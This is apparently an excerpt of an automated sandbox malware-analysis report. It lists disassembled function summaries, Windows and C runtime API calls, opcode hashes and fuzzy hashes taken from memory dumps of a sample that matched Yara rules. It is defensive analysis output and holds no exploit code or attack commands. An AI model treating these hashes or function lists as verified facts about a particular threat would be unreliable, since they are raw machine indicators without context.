• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
• Instruction ID: 60c2fdc778206387c503a8e0db9f3ff61ace97c6b1d5a66c2784078e508853cb
• Opcode Fuzzy Hash: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
• Instruction Fuzzy Hash: 3811F576200009BFCF91EF94C844CDD3BA5EF04354B0188A1FA4A9F235DA32EE90EB81
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 004011B5
• std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204
  • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
  • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD
• std::bad_exception::bad_exception.LIBCMT ref: 00401225
• __CxxThrowException@8.LIBVCRUNTIME ref: 00401233
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
• std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7
Strings
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
• String ID: bad locale name
• API String ID: 835844855-1405518554
• Opcode ID: 5a325a68ccf4bdc99371d265bda0e11596e817bf0efbd4651ddb8449f53c4424
• Instruction ID: 963657a0c5d8f337c123b09bbff0c4169cb5784efefba0bb6704a6d5c2622931
• Opcode Fuzzy Hash: 5a325a68ccf4bdc99371d265bda0e11596e817bf0efbd4651ddb8449f53c4424
• Instruction Fuzzy Hash: 5E319F31905B40DEC7319F6AD941A5BFBF0BF48714B508A7FE04AA3AA1C738A504CB5D
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 05CE3656
• std::_Lockit::_Lockit.LIBCPMT ref: 05CE3665
• int.LIBCPMT ref: 05CE367C
  • Part of subcall function 05CE157F: std::_Lockit::_Lockit.LIBCPMT ref: 05CE1590
  • Part of subcall function 05CE157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05CE15AA
• std::locale::_Getfacet.LIBCPMT ref: 05CE3685
• std::_Facet_Register.LIBCPMT ref: 05CE36B6
• std::_Lockit::~_Lockit.LIBCPMT ref: 05CE36CC
• __CxxThrowException@8.LIBVCRUNTIME ref: 05CE36F2
Strings
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
• String ID: {wB
• API String ID: 1202896665-1598656814
• Opcode ID: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
• Instruction ID: 08596b53ea950cf52f1155125d71a625f8c06ddec50b968c38605eb044d40afb
• Opcode Fuzzy Hash: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
• Instruction Fuzzy Hash: 2E11A372A002649BCB15EBA4CC48AEE7BB9FF85720F140D1AE416B7290DB74AA04D794
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 26e97803392628a66f226ceeca960576ab6ae59f7b73d64c31b09e82fec4626e
• Instruction ID: 73cb72f507c3d50e0cbff2fb1529f80598a5af570fd775ef65b15c2358fe50ea
• Opcode Fuzzy Hash: 26e97803392628a66f226ceeca960576ab6ae59f7b73d64c31b09e82fec4626e
• Instruction Fuzzy Hash: 62C1E475E08349AFDF51DFA8DC84BADBBB1BF09310F084999E641AB391C7309A41CB65
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 00414CF4
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414D65
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414D7E
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414DB0
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414DB9
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414DC5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                   • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                  • String ID: C
                                                                                                                                                                                                                                  • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                  • Opcode ID: 867fa0ef6cc85311a84fab34ced728f8fa705af9a4dc30a667b1e83018fa5afb
                                                                                                                                                                                                                                  • Instruction ID: 4e3572d10ca72b0cc8c55f95b2e81b49ef67830968b65e4bef4c2f16e2eaf972
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 867fa0ef6cc85311a84fab34ced728f8fa705af9a4dc30a667b1e83018fa5afb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71B11875A012199BDB24DF18D884BEEB7B4FF88314F6045AAE809A7350E735AE91CF44
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 05CF6F80: GetLastError.KERNEL32(?,?,05CEE697,?,?,?,05CEED94,?), ref: 05CF6F84
                                                                                                                                                                                                                                    • Part of subcall function 05CF6F80: _free.LIBCMT ref: 05CF6FB7
                                                                                                                                                                                                                                    • Part of subcall function 05CF6F80: SetLastError.KERNEL32(00000000), ref: 05CF6FF8
                                                                                                                                                                                                                                    • Part of subcall function 05CF6F80: _abort.LIBCMT ref: 05CF6FFE
                                                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 05CF4F5B
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF4FCC
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF4FE5
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF5017
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF5020
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF502C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                  • String ID: C
                                                                                                                                                                                                                                  • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                  • Opcode ID: cb8600919e0bc0bfd4afc96a1d1b02341e3be43e8f324f1b28cbb9493ad17bb2
                                                                                                                                                                                                                                  • Instruction ID: 6f8bcdcea9191f5f106ae7f4b1053260694e3d17a000b5d377f018b67990ff77
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb8600919e0bc0bfd4afc96a1d1b02341e3be43e8f324f1b28cbb9493ad17bb2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CB12C75A01219DFDF68DF18C888AAEB7B5FF48304F1049AADA49A7350D735AE90CF40
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 004167D1
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 004168B6
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00416926
                                                                                                                                                                                                                                    • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0041692F
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00416954
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                   • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3864826663-0
                                                                                                                                                                                                                                  • Opcode ID: b8827a1c079bf13245f6a2b5397cba4bf80c3eb245bf2fea745f98744adb5078
                                                                                                                                                                                                                                  • Instruction ID: 26764a85889f0707fbffed2f2a276afb84307330fa482a04e449b3980190c86e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8827a1c079bf13245f6a2b5397cba4bf80c3eb245bf2fea745f98744adb5078
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C51D4B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFD04D6280DB38DC80C6A8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                   • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 7da7e4f938cfb7f53f4ee3042c9ba99eb24c12608d8937e14d039355d897170d
                                                                                                                                                                                                                                  • Instruction ID: 68ef0a4baed83bf313a212b59b327df333dc31b97233ae496646a1f671aa2022
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7da7e4f938cfb7f53f4ee3042c9ba99eb24c12608d8937e14d039355d897170d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A61B171900205AFDB20DF65C841BEABBF4EF48710F1441BBED44EB252E734AD868B98
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 16879e562c41d271cc16cff151e7cbd4d44b0ffa200e9325e312bb0433d02818
                                                                                                                                                                                                                                  • Instruction ID: 41a3fe5170958441eaa86500ec228bba5868c20a189a0ea3117ada93a9d0fde8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16879e562c41d271cc16cff151e7cbd4d44b0ffa200e9325e312bb0433d02818
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF61C475A04205AFDF60DFA8C841BAEBBF5FF44710F14496AEA45EB240DB709A41DB90
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00415AD0
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00415AEB
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                   • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                  • Opcode ID: 0ae999e74c312fbf0247888fa3a2934b9317c3a2d6cc292263a5c2c0b7bdde97
                                                                                                                                                                                                                                  • Instruction ID: 97884a52693caeb5a5c3a9d5f4bc50bcec63f9a7d6aba0d10f38b6cf3ce1f43d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ae999e74c312fbf0247888fa3a2934b9317c3a2d6cc292263a5c2c0b7bdde97
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C051F1B1A05608DFDB10CFA8D881BEEBBF4EF49310F14416BE955E3291D774A981CB68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,05CF63EF,?,?,?,?,?,?), ref: 05CF5CBC
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 05CF5D37
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 05CF5D52
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 05CF5D78
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,05CF63EF,00000000,?,?,?,?,?,?,?,?,?,05CF63EF,?), ref: 05CF5D97
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,05CF63EF,00000000,?,?,?,?,?,?,?,?,?,05CF63EF,?), ref: 05CF5DD0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                  • Opcode ID: cb6d35f48d1bebdfaee63c5326d5eda48187afe5479d9753ca614cb5bfedeae6
                                                                                                                                                                                                                                  • Instruction ID: 4d795b1b984dc8abf43f9399c60103fdef18c1c62fd80f0346454b2c5d7d13f9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb6d35f48d1bebdfaee63c5326d5eda48187afe5479d9753ca614cb5bfedeae6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E351D471A00249AFDB20CFA8D885BEEBBF4FF09300F15456AE651F7291D7349951CBA4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0040C7DB
                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0040C7E3
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0040C871
                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0040C89C
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0040C8F1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
                                                                                                                                                                                                                                  • Instruction ID: 4609d27efc8d7a17fa762f128460d8fd5adcc0840ed3b149ea1d44a8c589526f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F418235E00208DBCB10EF69C880A9EBBB5AF45315F14C27BE8156B3D1D7399945CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 05CE141C
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 05CE142E
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 05CE146B
                                                                                                                                                                                                                                    • Part of subcall function 05CE80E1: _Yarn.LIBCPMT ref: 05CE8100
                                                                                                                                                                                                                                    • Part of subcall function 05CE80E1: _Yarn.LIBCPMT ref: 05CE8124
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 05CE148C
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 05CE149A
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 05CE14BD
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 05CE152E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 835844855-0
                                                                                                                                                                                                                                  • Opcode ID: 7b966b326459ba2342e1ffa8f210576540c6bcc155a50cbc91a1a0f115c5258d
                                                                                                                                                                                                                                  • Instruction ID: 1bd228da3dbe0402d34735a528443132ebae18fb1d1cce603f4e58e0ce03efd4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b966b326459ba2342e1ffa8f210576540c6bcc155a50cbc91a1a0f115c5258d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89317E72905B40DFC736AF29D84465AFBF4FF48A10B14CE2FE09B92A40C774A605DB59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: fc80b842ec2fa87e1f3d7b13bcdad74e1acd085aed55d4be6a2af7e8e8dba1d6
                                                                                                                                                                                                                                  • Instruction ID: eb3437e7256d6e9500263c5b78cb76159e7e032ed684a14598ba9abdd6a69119
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc80b842ec2fa87e1f3d7b13bcdad74e1acd085aed55d4be6a2af7e8e8dba1d6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85112BB27081297FDB202F739D04AAF3A5CDF85734B51022EBC15D6241DEBC88818669
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041F123: _free.LIBCMT ref: 0041F14C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F42A
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F435
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F440
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F494
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F49F
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F4AA
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F4B5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
• Instruction ID: 6442e121d4515539895166ad143442a8d84c52f7901faf26133e6203624009ae
• Opcode Fuzzy Hash: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
• Instruction Fuzzy Hash: 79113D71540B14FADA20BBF2DC07FCB77DCAF4470CF40482EBA9A66052DA7DB9894654
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 05CFF38A: _free.LIBCMT ref: 05CFF3B3
• _free.LIBCMT ref: 05CFF691
  • Part of subcall function 05CF6501: HeapFree.KERNEL32(00000000,00000000,?,05CFF3B8,?,00000000,?,00000000,?,05CFF65C,?,00000007,?,?,05CFFA50,?), ref: 05CF6517
  • Part of subcall function 05CF6501: GetLastError.KERNEL32(?,?,05CFF3B8,?,00000000,?,00000000,?,05CFF65C,?,00000007,?,?,05CFFA50,?,?), ref: 05CF6529
• _free.LIBCMT ref: 05CFF69C
• _free.LIBCMT ref: 05CFF6A7
• _free.LIBCMT ref: 05CFF6FB
• _free.LIBCMT ref: 05CFF706
• _free.LIBCMT ref: 05CFF711
• _free.LIBCMT ref: 05CFF71C
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
• Instruction ID: 085445c6cf7a3b734d574a86dbe914d736fed9e5b18b1274be8123c1b17cbaad
• Opcode Fuzzy Hash: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
• Instruction Fuzzy Hash: 94115473641708BADEB0B7B0CC49FCB779DEF08700F401C19A79A66050DA69F548AB51
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 0040418E
• std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
• int.LIBCPMT ref: 004041B4
  • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
  • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
• std::locale::_Getfacet.LIBCPMT ref: 004041BD
• std::_Facet_Register.LIBCPMT ref: 004041EE
• std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040422A
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
